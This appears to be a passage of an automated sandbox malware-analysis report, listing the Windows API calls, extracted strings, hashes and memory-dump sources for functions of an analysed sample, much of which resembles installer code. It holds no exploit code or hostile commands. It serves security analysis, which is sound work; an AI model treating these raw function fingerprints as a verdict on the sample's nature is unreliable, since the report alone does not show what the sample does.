                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                                                                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                                                                                                                                                                                                                                                                                  • IsRectEmpty.USER32(?), ref: 0044E963
                                                                                                                                                                                                                                                                                                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 855768636-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                                                                                                                                                                                                                                                                                                                  • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: OffsetRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 177026234-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 00417270
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                                                                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1959210111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B94
                                                                                                                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416BAE
                                                                                                                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BC8
                                                                                                                                                                                                                                                                                                                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 601730667-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e00bfe9aa6131f48cff3dcc7af916a378e96ad52e4fe803e9d506167a3009904
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e00bfe9aa6131f48cff3dcc7af916a378e96ad52e4fe803e9d506167a3009904
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                                                                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4071923889-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                                                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                                                                                                                                                                                                                                                                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e4229e138499de8d2808c65d3409da6e5b604f2f015f14c2150909c6176e447
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                                                                                                                                                                                                                                                                                                                                  • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-1392080489
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 45a9997a28aa55db17c716ab1d5551bd27f478ca94a3e1f3135f7cec6ca191fc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45a9997a28aa55db17c716ab1d5551bd27f478ca94a3e1f3135f7cec6ca191fc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                                                                                                                                                                                                                                                                                                                                  • Setting NTFS compression on file: %s, xrefs: 00470867
                                                                                                                                                                                                                                                                                                                                                                  • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3038984924
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a380c5b27ca8ef2e6236f0428f65491e762024a1caeb95240921d3301164247d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a380c5b27ca8ef2e6236f0428f65491e762024a1caeb95240921d3301164247d
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                                                                                                                                                                                                                                                                                                                                  • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                                                                                                                                                                                                                                                                                                                                  • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4283692357-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CountSleepTick
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2227064392-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000644,?,L2h,004013A3,?,?,00401443,?,?,?,00000000,00004003,00401983), ref: 00401353
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,2h$H,h$L2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-1199669984
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 215268677-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

